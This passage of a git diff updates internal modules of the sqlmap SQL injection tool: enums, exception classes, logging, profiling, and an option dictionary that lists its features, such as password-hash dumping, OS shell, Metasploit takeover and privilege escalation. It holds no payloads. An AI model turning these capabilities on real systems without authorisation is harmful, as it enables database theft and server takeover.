FILE_WRITE = 22
|
||||||
|
OS_CMD = 23
|
||||||
|
REG_READ = 24
|
||||||
|
|
||||||
|
PART_RUN_CONTENT_TYPES = {
|
||||||
|
"checkDbms": CONTENT_TYPE.TECHNIQUES,
|
||||||
|
"getFingerprint": CONTENT_TYPE.DBMS_FINGERPRINT,
|
||||||
|
"getBanner": CONTENT_TYPE.BANNER,
|
||||||
|
"getCurrentUser": CONTENT_TYPE.CURRENT_USER,
|
||||||
|
"getCurrentDb": CONTENT_TYPE.CURRENT_DB,
|
||||||
|
"getHostname": CONTENT_TYPE.HOSTNAME,
|
||||||
|
"isDba": CONTENT_TYPE.IS_DBA,
|
||||||
|
"getUsers": CONTENT_TYPE.USERS,
|
||||||
|
"getPasswordHashes": CONTENT_TYPE.PASSWORDS,
|
||||||
|
"getPrivileges": CONTENT_TYPE.PRIVILEGES,
|
||||||
|
"getRoles": CONTENT_TYPE.ROLES,
|
||||||
|
"getDbs": CONTENT_TYPE.DBS,
|
||||||
|
"getTables": CONTENT_TYPE.TABLES,
|
||||||
|
"getColumns": CONTENT_TYPE.COLUMNS,
|
||||||
|
"getSchema": CONTENT_TYPE.SCHEMA,
|
||||||
|
"getCount": CONTENT_TYPE.COUNT,
|
||||||
|
"dumpTable": CONTENT_TYPE.DUMP_TABLE,
|
||||||
|
"search": CONTENT_TYPE.SEARCH,
|
||||||
|
"sqlQuery": CONTENT_TYPE.SQL_QUERY,
|
||||||
|
"tableExists": CONTENT_TYPE.COMMON_TABLES,
|
||||||
|
"columnExists": CONTENT_TYPE.COMMON_COLUMNS,
|
||||||
|
"readFile": CONTENT_TYPE.FILE_READ,
|
||||||
|
"writeFile": CONTENT_TYPE.FILE_WRITE,
|
||||||
|
"osCmd": CONTENT_TYPE.OS_CMD,
|
||||||
|
"regRead": CONTENT_TYPE.REG_READ
|
||||||
|
}
|
||||||
|
|
||||||
|
class CONTENT_STATUS:
|
||||||
|
IN_PROGRESS = 0
|
||||||
|
COMPLETE = 1
|
||||||
|
|
||||||
|
class AUTH_TYPE:
|
||||||
|
BASIC = "basic"
|
||||||
|
DIGEST = "digest"
|
||||||
|
NTLM = "ntlm"
|
||||||
|
PKI = "pki"
|
||||||
|
|
||||||
|
class AUTOCOMPLETE_TYPE:
|
||||||
|
SQL = 0
|
||||||
|
OS = 1
|
||||||
|
SQLMAP = 2
|
||||||
|
|
||||||
|
class NOTE:
|
||||||
|
FALSE_POSITIVE_OR_UNEXPLOITABLE = "false positive or unexploitable"
|
||||||
|
|
||||||
|
class MKSTEMP_PREFIX:
|
||||||
|
HASHES = "sqlmaphashes-"
|
||||||
|
CRAWLER = "sqlmapcrawler-"
|
||||||
|
IPC = "sqlmapipc-"
|
||||||
|
TESTING = "sqlmaptesting-"
|
||||||
|
RESULTS = "sqlmapresults-"
|
||||||
|
COOKIE_JAR = "sqlmapcookiejar-"
|
||||||
|
BIG_ARRAY = "sqlmapbigarray-"
|
||||||
@@ -1,119 +1,75 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
$Id$
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
|
|
||||||
|
|
||||||
Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
|
||||||
and Daniele Bellucci <daniele.bellucci@gmail.com>
|
|
||||||
|
|
||||||
sqlmap is free software; you can redistribute it and/or modify it under
|
|
||||||
the terms of the GNU General Public License as published by the Free
|
|
||||||
Software Foundation version 2 of the License.
|
|
||||||
|
|
||||||
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
|
||||||
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
|
||||||
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
|
||||||
details.
|
|
||||||
|
|
||||||
You should have received a copy of the GNU General Public License along
|
|
||||||
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
|
||||||
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
class SqlmapBaseException(Exception):
|
||||||
|
|
||||||
import sys
|
|
||||||
|
|
||||||
from lib.core.settings import VERSION
|
|
||||||
from lib.core.settings import VERSION_STRING
|
|
||||||
|
|
||||||
|
|
||||||
class sqlmapConnectionException(Exception):
|
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
class SqlmapCompressionException(SqlmapBaseException):
|
||||||
class sqlmapDataException(Exception):
|
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
class SqlmapConnectionException(SqlmapBaseException):
|
||||||
class sqlmapFilePathException(Exception):
|
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
class SqlmapDataException(SqlmapBaseException):
|
||||||
class sqlmapGenericException(Exception):
|
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
class SqlmapFilePathException(SqlmapBaseException):
|
||||||
class sqlmapMissingMandatoryOptionException(Exception):
|
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
class SqlmapGenericException(SqlmapBaseException):
|
||||||
class sqlmapNoneDataException(Exception):
|
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
class SqlmapInstallationException(SqlmapBaseException):
|
||||||
class sqlmapRegExprException(Exception):
|
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
class SqlmapMissingDependence(SqlmapBaseException):
|
||||||
class sqlmapSyntaxException(Exception):
|
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
class SqlmapMissingMandatoryOptionException(SqlmapBaseException):
|
||||||
class sqlmapUndefinedMethod(Exception):
|
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
class SqlmapMissingPrivileges(SqlmapBaseException):
|
||||||
class sqlmapMissingPrivileges(Exception):
|
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
class SqlmapNoneDataException(SqlmapBaseException):
|
||||||
class sqlmapNotVulnerableException(Exception):
|
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
class SqlmapNotVulnerableException(SqlmapBaseException):
|
||||||
class sqlmapThreadException(Exception):
|
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
class SqlmapSilentQuitException(SqlmapBaseException):
|
||||||
class sqlmapUnsupportedDBMSException(Exception):
|
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
class SqlmapUserQuitException(SqlmapBaseException):
|
||||||
class sqlmapUnsupportedFeatureException(Exception):
|
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
class SqlmapShellQuitException(SqlmapBaseException):
|
||||||
class sqlmapValueException(Exception):
|
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
class SqlmapSyntaxException(SqlmapBaseException):
|
||||||
|
pass
|
||||||
|
|
||||||
def unhandledException():
|
class SqlmapSystemException(SqlmapBaseException):
|
||||||
errMsg = "unhandled exception in %s, please copy " % VERSION_STRING
|
pass
|
||||||
errMsg += "the command line and the following text and send by e-mail "
|
|
||||||
errMsg += "to sqlmap-users@lists.sourceforge.net. The developers will "
|
|
||||||
errMsg += "fix it as soon as possible:\nsqlmap version: %s\n" % VERSION
|
|
||||||
errMsg += "Python version: %s\n" % sys.version.split()[0]
|
|
||||||
errMsg += "Operating system: %s" % sys.platform
|
|
||||||
return errMsg
|
|
||||||
|
|
||||||
|
class SqlmapThreadException(SqlmapBaseException):
|
||||||
|
pass
|
||||||
|
|
||||||
exceptionsTuple = (
|
class SqlmapTokenException(SqlmapBaseException):
|
||||||
sqlmapConnectionException,
|
pass
|
||||||
sqlmapDataException,
|
|
||||||
sqlmapFilePathException,
|
class SqlmapUndefinedMethod(SqlmapBaseException):
|
||||||
sqlmapGenericException,
|
pass
|
||||||
sqlmapMissingMandatoryOptionException,
|
|
||||||
sqlmapNoneDataException,
|
class SqlmapUnsupportedDBMSException(SqlmapBaseException):
|
||||||
sqlmapRegExprException,
|
pass
|
||||||
sqlmapSyntaxException,
|
|
||||||
sqlmapUndefinedMethod,
|
class SqlmapUnsupportedFeatureException(SqlmapBaseException):
|
||||||
sqlmapMissingPrivileges,
|
pass
|
||||||
sqlmapNotVulnerableException,
|
|
||||||
sqlmapThreadException,
|
class SqlmapValueException(SqlmapBaseException):
|
||||||
sqlmapUnsupportedDBMSException,
|
pass
|
||||||
sqlmapUnsupportedFeatureException,
|
|
||||||
sqlmapValueException,
|
|
||||||
)
|
|
||||||
|
|||||||
44
lib/core/log.py
Normal file
44
lib/core/log.py
Normal file
@@ -0,0 +1,44 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
import logging
|
||||||
|
import sys
|
||||||
|
|
||||||
|
from lib.core.enums import CUSTOM_LOGGING
|
||||||
|
|
||||||
|
logging.addLevelName(CUSTOM_LOGGING.PAYLOAD, "PAYLOAD")
|
||||||
|
logging.addLevelName(CUSTOM_LOGGING.TRAFFIC_OUT, "TRAFFIC OUT")
|
||||||
|
logging.addLevelName(CUSTOM_LOGGING.TRAFFIC_IN, "TRAFFIC IN")
|
||||||
|
|
||||||
|
LOGGER = logging.getLogger("sqlmapLog")
|
||||||
|
|
||||||
|
LOGGER_HANDLER = None
|
||||||
|
try:
|
||||||
|
from thirdparty.ansistrm.ansistrm import ColorizingStreamHandler
|
||||||
|
|
||||||
|
disableColor = False
|
||||||
|
|
||||||
|
for argument in sys.argv:
|
||||||
|
if "disable-col" in argument:
|
||||||
|
disableColor = True
|
||||||
|
break
|
||||||
|
|
||||||
|
if disableColor:
|
||||||
|
LOGGER_HANDLER = logging.StreamHandler(sys.stdout)
|
||||||
|
else:
|
||||||
|
LOGGER_HANDLER = ColorizingStreamHandler(sys.stdout)
|
||||||
|
LOGGER_HANDLER.level_map[logging.getLevelName("PAYLOAD")] = (None, "cyan", False)
|
||||||
|
LOGGER_HANDLER.level_map[logging.getLevelName("TRAFFIC OUT")] = (None, "magenta", False)
|
||||||
|
LOGGER_HANDLER.level_map[logging.getLevelName("TRAFFIC IN")] = ("magenta", None, False)
|
||||||
|
except ImportError:
|
||||||
|
LOGGER_HANDLER = logging.StreamHandler(sys.stdout)
|
||||||
|
|
||||||
|
FORMATTER = logging.Formatter("\r[%(asctime)s] [%(levelname)s] %(message)s", "%H:%M:%S")
|
||||||
|
|
||||||
|
LOGGER_HANDLER.setFormatter(FORMATTER)
|
||||||
|
LOGGER.addHandler(LOGGER_HANDLER)
|
||||||
|
LOGGER.setLevel(logging.INFO)
|
||||||
2604
lib/core/option.py
2604
lib/core/option.py
File diff suppressed because it is too large
Load Diff
@@ -1,69 +1,111 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
$Id$
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
|
|
||||||
|
|
||||||
Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
|
||||||
and Daniele Bellucci <daniele.bellucci@gmail.com>
|
|
||||||
|
|
||||||
sqlmap is free software; you can redistribute it and/or modify it under
|
|
||||||
the terms of the GNU General Public License as published by the Free
|
|
||||||
Software Foundation version 2 of the License.
|
|
||||||
|
|
||||||
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
|
||||||
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
|
||||||
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
|
||||||
details.
|
|
||||||
|
|
||||||
You should have received a copy of the GNU General Public License along
|
|
||||||
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
|
||||||
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
optDict = {
|
optDict = {
|
||||||
# Family: { "parameter_name": "parameter_datatype" },
|
# Format:
|
||||||
|
# Family: { "parameter name": "parameter datatype" },
|
||||||
|
# Or:
|
||||||
|
# Family: { "parameter name": ("parameter datatype", "category name used for common outputs feature") },
|
||||||
"Target": {
|
"Target": {
|
||||||
|
"direct": "string",
|
||||||
"url": "string",
|
"url": "string",
|
||||||
"list": "string",
|
"logFile": "string",
|
||||||
|
"bulkFile": "string",
|
||||||
|
"requestFile": "string",
|
||||||
|
"sessionFile": "string",
|
||||||
"googleDork": "string",
|
"googleDork": "string",
|
||||||
|
"configFile": "string",
|
||||||
|
"sitemapUrl": "string",
|
||||||
},
|
},
|
||||||
|
|
||||||
"Request": {
|
"Request": {
|
||||||
"method": "string",
|
"method": "string",
|
||||||
"data": "string",
|
"data": "string",
|
||||||
|
"paramDel": "string",
|
||||||
"cookie": "string",
|
"cookie": "string",
|
||||||
"referer": "string",
|
"cookieDel": "string",
|
||||||
|
"loadCookies": "string",
|
||||||
|
"dropSetCookie": "boolean",
|
||||||
"agent": "string",
|
"agent": "string",
|
||||||
"userAgentsFile": "string",
|
"randomAgent": "boolean",
|
||||||
|
"host": "string",
|
||||||
|
"referer": "string",
|
||||||
"headers": "string",
|
"headers": "string",
|
||||||
"aType": "string",
|
"authType": "string",
|
||||||
"aCred": "string",
|
"authCred": "string",
|
||||||
|
"authFile": "string",
|
||||||
"proxy": "string",
|
"proxy": "string",
|
||||||
"threads": "integer",
|
"proxyCred": "string",
|
||||||
|
"proxyFile": "string",
|
||||||
|
"ignoreProxy": "boolean",
|
||||||
|
"tor": "boolean",
|
||||||
|
"torPort": "integer",
|
||||||
|
"torType": "string",
|
||||||
|
"checkTor": "boolean",
|
||||||
"delay": "float",
|
"delay": "float",
|
||||||
"timeout": "float",
|
"timeout": "float",
|
||||||
|
"retries": "integer",
|
||||||
|
"rParam": "string",
|
||||||
|
"safeUrl": "string",
|
||||||
|
"safePost": "string",
|
||||||
|
"safeReqFile": "string",
|
||||||
|
"safeFreq": "integer",
|
||||||
|
"skipUrlEncode": "boolean",
|
||||||
|
"csrfToken": "string",
|
||||||
|
"csrfUrl": "string",
|
||||||
|
"forceSSL": "boolean",
|
||||||
|
"hpp": "boolean",
|
||||||
|
"evalCode": "string",
|
||||||
|
},
|
||||||
|
|
||||||
|
"Optimization": {
|
||||||
|
"optimize": "boolean",
|
||||||
|
"predictOutput": "boolean",
|
||||||
|
"keepAlive": "boolean",
|
||||||
|
"nullConnection": "boolean",
|
||||||
|
"threads": "integer",
|
||||||
},
|
},
|
||||||
|
|
||||||
"Injection": {
|
"Injection": {
|
||||||
"testParameter": "string",
|
"testParameter": "string",
|
||||||
|
"skip": "string",
|
||||||
|
"skipStatic": "boolean",
|
||||||
"dbms": "string",
|
"dbms": "string",
|
||||||
|
"dbmsCred": "string",
|
||||||
|
"os": "string",
|
||||||
|
"invalidBignum": "boolean",
|
||||||
|
"invalidLogical": "boolean",
|
||||||
|
"invalidString": "boolean",
|
||||||
|
"noCast": "boolean",
|
||||||
|
"noEscape": "boolean",
|
||||||
"prefix": "string",
|
"prefix": "string",
|
||||||
"postfix": "string",
|
"suffix": "string",
|
||||||
|
"tamper": "string",
|
||||||
|
},
|
||||||
|
|
||||||
|
"Detection": {
|
||||||
|
"level": "integer",
|
||||||
|
"risk": "integer",
|
||||||
"string": "string",
|
"string": "string",
|
||||||
|
"notString": "string",
|
||||||
"regexp": "string",
|
"regexp": "string",
|
||||||
"eString": "string",
|
"code": "integer",
|
||||||
"eRegexp": "string",
|
"textOnly": "boolean",
|
||||||
|
"titles": "boolean",
|
||||||
},
|
},
|
||||||
|
|
||||||
"Techniques": {
|
"Techniques": {
|
||||||
"stackedTest": "boolean",
|
"tech": "string",
|
||||||
"timeTest": "boolean",
|
"timeSec": "integer",
|
||||||
"unionTest": "boolean",
|
"uCols": "string",
|
||||||
"unionUse": "boolean",
|
"uChar": "string",
|
||||||
|
"uFrom": "string",
|
||||||
|
"dnsName": "string",
|
||||||
|
"secondOrder": "string",
|
||||||
},
|
},
|
||||||
|
|
||||||
"Fingerprint": {
|
"Fingerprint": {
|
||||||
@@ -71,43 +113,131 @@ optDict = {
|
|||||||
},
|
},
|
||||||
|
|
||||||
"Enumeration": {
|
"Enumeration": {
|
||||||
"getBanner": "boolean",
|
"getAll": "boolean",
|
||||||
"getCurrentUser": "boolean",
|
"getBanner": ("boolean", "Banners"),
|
||||||
"getCurrentDb": "boolean",
|
"getCurrentUser": ("boolean", "Users"),
|
||||||
|
"getCurrentDb": ("boolean", "Databases"),
|
||||||
|
"getHostname": "boolean",
|
||||||
"isDba": "boolean",
|
"isDba": "boolean",
|
||||||
"getUsers": "boolean",
|
"getUsers": ("boolean", "Users"),
|
||||||
"getPasswordHashes": "boolean",
|
"getPasswordHashes": ("boolean", "Passwords"),
|
||||||
"getPrivileges": "boolean",
|
"getPrivileges": ("boolean", "Privileges"),
|
||||||
"getDbs": "boolean",
|
"getRoles": ("boolean", "Roles"),
|
||||||
"getTables": "boolean",
|
"getDbs": ("boolean", "Databases"),
|
||||||
"getColumns": "boolean",
|
"getTables": ("boolean", "Tables"),
|
||||||
|
"getColumns": ("boolean", "Columns"),
|
||||||
|
"getSchema": "boolean",
|
||||||
|
"getCount": "boolean",
|
||||||
"dumpTable": "boolean",
|
"dumpTable": "boolean",
|
||||||
"dumpAll": "boolean",
|
"dumpAll": "boolean",
|
||||||
"user": "string",
|
"search": "boolean",
|
||||||
|
"getComments": "boolean",
|
||||||
"db": "string",
|
"db": "string",
|
||||||
"tbl": "string",
|
"tbl": "string",
|
||||||
"col": "string",
|
"col": "string",
|
||||||
|
"excludeCol": "string",
|
||||||
|
"pivotColumn": "string",
|
||||||
|
"dumpWhere": "string",
|
||||||
|
"user": "string",
|
||||||
"excludeSysDbs": "boolean",
|
"excludeSysDbs": "boolean",
|
||||||
"limitStart": "integer",
|
"limitStart": "integer",
|
||||||
"limitStop": "integer",
|
"limitStop": "integer",
|
||||||
|
"firstChar": "integer",
|
||||||
|
"lastChar": "integer",
|
||||||
"query": "string",
|
"query": "string",
|
||||||
"sqlShell": "boolean",
|
"sqlShell": "boolean",
|
||||||
|
"sqlFile": "string",
|
||||||
|
},
|
||||||
|
|
||||||
|
"Brute": {
|
||||||
|
"commonTables": "boolean",
|
||||||
|
"commonColumns": "boolean",
|
||||||
|
},
|
||||||
|
|
||||||
|
"User-defined function": {
|
||||||
|
"udfInject": "boolean",
|
||||||
|
"shLib": "string",
|
||||||
},
|
},
|
||||||
|
|
||||||
"File system": {
|
"File system": {
|
||||||
"rFile": "string",
|
"rFile": "string",
|
||||||
"wFile": "string",
|
"wFile": "string",
|
||||||
|
"dFile": "string",
|
||||||
},
|
},
|
||||||
|
|
||||||
"Takeover": {
|
"Takeover": {
|
||||||
|
"osCmd": "string",
|
||||||
"osShell": "boolean",
|
"osShell": "boolean",
|
||||||
|
"osPwn": "boolean",
|
||||||
|
"osSmb": "boolean",
|
||||||
|
"osBof": "boolean",
|
||||||
|
"privEsc": "boolean",
|
||||||
|
"msfPath": "string",
|
||||||
|
"tmpPath": "string",
|
||||||
|
},
|
||||||
|
|
||||||
|
"Windows": {
|
||||||
|
"regRead": "boolean",
|
||||||
|
"regAdd": "boolean",
|
||||||
|
"regDel": "boolean",
|
||||||
|
"regKey": "string",
|
||||||
|
"regVal": "string",
|
||||||
|
"regData": "string",
|
||||||
|
"regType": "string",
|
||||||
|
},
|
||||||
|
|
||||||
|
"General": {
|
||||||
|
#"xmlFile": "string",
|
||||||
|
"trafficFile": "string",
|
||||||
|
"batch": "boolean",
|
||||||
|
"binaryFields": "string",
|
||||||
|
"charset": "string",
|
||||||
|
"crawlDepth": "integer",
|
||||||
|
"crawlExclude": "string",
|
||||||
|
"csvDel": "string",
|
||||||
|
"dumpFormat": "string",
|
||||||
|
"eta": "boolean",
|
||||||
|
"flushSession": "boolean",
|
||||||
|
"forms": "boolean",
|
||||||
|
"freshQueries": "boolean",
|
||||||
|
"hexConvert": "boolean",
|
||||||
|
"outputDir": "string",
|
||||||
|
"parseErrors": "boolean",
|
||||||
|
"saveConfig": "string",
|
||||||
|
"scope": "string",
|
||||||
|
"testFilter": "string",
|
||||||
|
"testSkip": "string",
|
||||||
|
"updateAll": "boolean",
|
||||||
},
|
},
|
||||||
|
|
||||||
"Miscellaneous": {
|
"Miscellaneous": {
|
||||||
"eta": "boolean",
|
"alert": "string",
|
||||||
|
"answers": "string",
|
||||||
|
"beep": "boolean",
|
||||||
|
"cleanup": "boolean",
|
||||||
|
"dependencies": "boolean",
|
||||||
|
"disableColoring": "boolean",
|
||||||
|
"googlePage": "integer",
|
||||||
|
"identifyWaf": "boolean",
|
||||||
|
"mobile": "boolean",
|
||||||
|
"offline": "boolean",
|
||||||
|
"pageRank": "boolean",
|
||||||
|
"purgeOutput": "boolean",
|
||||||
|
"skipWaf": "boolean",
|
||||||
|
"smart": "boolean",
|
||||||
|
"tmpDir": "string",
|
||||||
|
"wizard": "boolean",
|
||||||
"verbose": "integer",
|
"verbose": "integer",
|
||||||
"updateAll": "boolean",
|
|
||||||
"sessionFile": "string",
|
|
||||||
"batch": "boolean",
|
|
||||||
},
|
},
|
||||||
|
"Hidden": {
|
||||||
|
"dummy": "boolean",
|
||||||
|
"disablePrecon": "boolean",
|
||||||
|
"profile": "boolean",
|
||||||
|
"forceDns": "boolean",
|
||||||
|
"ignore401": "boolean",
|
||||||
|
"smokeTest": "boolean",
|
||||||
|
"liveTest": "boolean",
|
||||||
|
"stopFail": "boolean",
|
||||||
|
"runCase": "string",
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
89
lib/core/profiling.py
Normal file
89
lib/core/profiling.py
Normal file
@@ -0,0 +1,89 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
import codecs
|
||||||
|
import os
|
||||||
|
import cProfile
|
||||||
|
|
||||||
|
from lib.core.common import getUnicode
|
||||||
|
from lib.core.data import logger
|
||||||
|
from lib.core.data import paths
|
||||||
|
from lib.core.settings import UNICODE_ENCODING
|
||||||
|
|
||||||
|
def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None):
|
||||||
|
"""
|
||||||
|
This will run the program and present profiling data in a nice looking graph
|
||||||
|
"""
|
||||||
|
|
||||||
|
try:
|
||||||
|
from thirdparty.gprof2dot import gprof2dot
|
||||||
|
from thirdparty.xdot import xdot
|
||||||
|
import gobject
|
||||||
|
import gtk
|
||||||
|
import pydot
|
||||||
|
except ImportError, e:
|
||||||
|
errMsg = "profiling requires third-party libraries ('%s') " % getUnicode(e, UNICODE_ENCODING)
|
||||||
|
errMsg += "(Hint: 'sudo apt-get install python-pydot python-pyparsing python-profiler graphviz')"
|
||||||
|
logger.error(errMsg)
|
||||||
|
|
||||||
|
return
|
||||||
|
|
||||||
|
if profileOutputFile is None:
|
||||||
|
profileOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, "sqlmap_profile.raw")
|
||||||
|
|
||||||
|
if dotOutputFile is None:
|
||||||
|
dotOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, "sqlmap_profile.dot")
|
||||||
|
|
||||||
|
if imageOutputFile is None:
|
||||||
|
imageOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, "sqlmap_profile.png")
|
||||||
|
|
||||||
|
if os.path.exists(profileOutputFile):
|
||||||
|
os.remove(profileOutputFile)
|
||||||
|
|
||||||
|
if os.path.exists(dotOutputFile):
|
||||||
|
os.remove(dotOutputFile)
|
||||||
|
|
||||||
|
if os.path.exists(imageOutputFile):
|
||||||
|
os.remove(imageOutputFile)
|
||||||
|
|
||||||
|
infoMsg = "profiling the execution into file %s" % profileOutputFile
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
# Start sqlmap main function and generate a raw profile file
|
||||||
|
cProfile.run("start()", profileOutputFile)
|
||||||
|
|
||||||
|
infoMsg = "converting profile data into a dot file '%s'" % dotOutputFile
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
# Create dot file by using extra/gprof2dot/gprof2dot.py
|
||||||
|
# http://code.google.com/p/jrfonseca/wiki/Gprof2Dot
|
||||||
|
dotFilePointer = codecs.open(dotOutputFile, 'wt', UNICODE_ENCODING)
|
||||||
|
parser = gprof2dot.PstatsParser(profileOutputFile)
|
||||||
|
profile = parser.parse()
|
||||||
|
profile.prune(0.5 / 100.0, 0.1 / 100.0)
|
||||||
|
dot = gprof2dot.DotWriter(dotFilePointer)
|
||||||
|
dot.graph(profile, gprof2dot.TEMPERATURE_COLORMAP)
|
||||||
|
dotFilePointer.close()
|
||||||
|
|
||||||
|
infoMsg = "converting dot file into a graph image '%s'" % imageOutputFile
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
# Create graph image (png) by using pydot (python-pydot)
|
||||||
|
# http://code.google.com/p/pydot/
|
||||||
|
pydotGraph = pydot.graph_from_dot_file(dotOutputFile)
|
||||||
|
pydotGraph.write_png(imageOutputFile)
|
||||||
|
|
||||||
|
infoMsg = "displaying interactive graph with xdot library"
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
# Display interactive Graphviz dot file by using extra/xdot/xdot.py
|
||||||
|
# http://code.google.com/p/jrfonseca/wiki/XDot
|
||||||
|
win = xdot.DotWindow()
|
||||||
|
win.connect('destroy', gtk.main_quit)
|
||||||
|
win.set_filter("dot")
|
||||||
|
win.open_file(dotOutputFile)
|
||||||
|
gtk.main()
|
||||||
@@ -1,111 +0,0 @@
|
|||||||
#!/usr/bin/env python
|
|
||||||
|
|
||||||
"""
|
|
||||||
$Id$
|
|
||||||
|
|
||||||
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
|
|
||||||
|
|
||||||
Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
|
||||||
and Daniele Bellucci <daniele.bellucci@gmail.com>
|
|
||||||
|
|
||||||
sqlmap is free software; you can redistribute it and/or modify it under
|
|
||||||
the terms of the GNU General Public License as published by the Free
|
|
||||||
Software Foundation version 2 of the License.
|
|
||||||
|
|
||||||
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
|
||||||
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
|
||||||
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
|
||||||
details.
|
|
||||||
|
|
||||||
You should have received a copy of the GNU General Public License along
|
|
||||||
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
|
||||||
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
|
||||||
"""
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
from lib.core.common import dataToStdout
|
|
||||||
|
|
||||||
|
|
||||||
class ProgressBar:
|
|
||||||
"""
|
|
||||||
This class defines methods to update and draw a progress bar
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(self, minValue=0, maxValue=10, totalWidth=54):
|
|
||||||
self.__progBar = "[]"
|
|
||||||
self.__oldProgBar = ""
|
|
||||||
self.__min = int(minValue)
|
|
||||||
self.__max = int(maxValue)
|
|
||||||
self.__span = self.__max - self.__min
|
|
||||||
self.__width = totalWidth
|
|
||||||
self.__amount = 0
|
|
||||||
self.update()
|
|
||||||
|
|
||||||
|
|
||||||
def __convertSeconds(self, value):
|
|
||||||
seconds = value
|
|
||||||
minutes = seconds / 60
|
|
||||||
seconds = seconds - (minutes * 60)
|
|
||||||
|
|
||||||
return "%.2d:%.2d" % (minutes, seconds)
|
|
||||||
|
|
||||||
|
|
||||||
def update(self, newAmount=0):
|
|
||||||
"""
|
|
||||||
This method updates the progress bar
|
|
||||||
"""
|
|
||||||
|
|
||||||
if newAmount < self.__min:
|
|
||||||
newAmount = self.__min
|
|
||||||
elif newAmount > self.__max:
|
|
||||||
newAmount = self.__max
|
|
||||||
|
|
||||||
self.__amount = newAmount
|
|
||||||
|
|
||||||
# Figure out the new percent done, round to an integer
|
|
||||||
diffFromMin = float(self.__amount - self.__min)
|
|
||||||
percentDone = (diffFromMin / float(self.__span)) * 100.0
|
|
||||||
percentDone = round(percentDone)
|
|
||||||
percentDone = int(percentDone)
|
|
||||||
|
|
||||||
# Figure out how many hash bars the percentage should be
|
|
||||||
allFull = self.__width - 2
|
|
||||||
numHashes = (percentDone / 100.0) * allFull
|
|
||||||
numHashes = int(round(numHashes))
|
|
||||||
|
|
||||||
# Build a progress bar with an arrow of equal signs
|
|
||||||
if numHashes == 0:
|
|
||||||
self.__progBar = "[>%s]" % (" " * (allFull - 1))
|
|
||||||
elif numHashes == allFull:
|
|
||||||
self.__progBar = "[%s]" % ("=" * allFull)
|
|
||||||
else:
|
|
||||||
self.__progBar = "[%s>%s]" % ("=" * (numHashes - 1),
|
|
||||||
" " * (allFull - numHashes))
|
|
||||||
|
|
||||||
# Add the percentage at the beginning of the progress bar
|
|
||||||
percentString = str(percentDone) + "%"
|
|
||||||
self.__progBar = "%s %s" % (percentString, self.__progBar)
|
|
||||||
|
|
||||||
|
|
||||||
def draw(self, eta=0):
|
|
||||||
"""
|
|
||||||
This method draws the progress bar if it has changed
|
|
||||||
"""
|
|
||||||
|
|
||||||
if self.__progBar != self.__oldProgBar:
|
|
||||||
self.__oldProgBar = self.__progBar
|
|
||||||
|
|
||||||
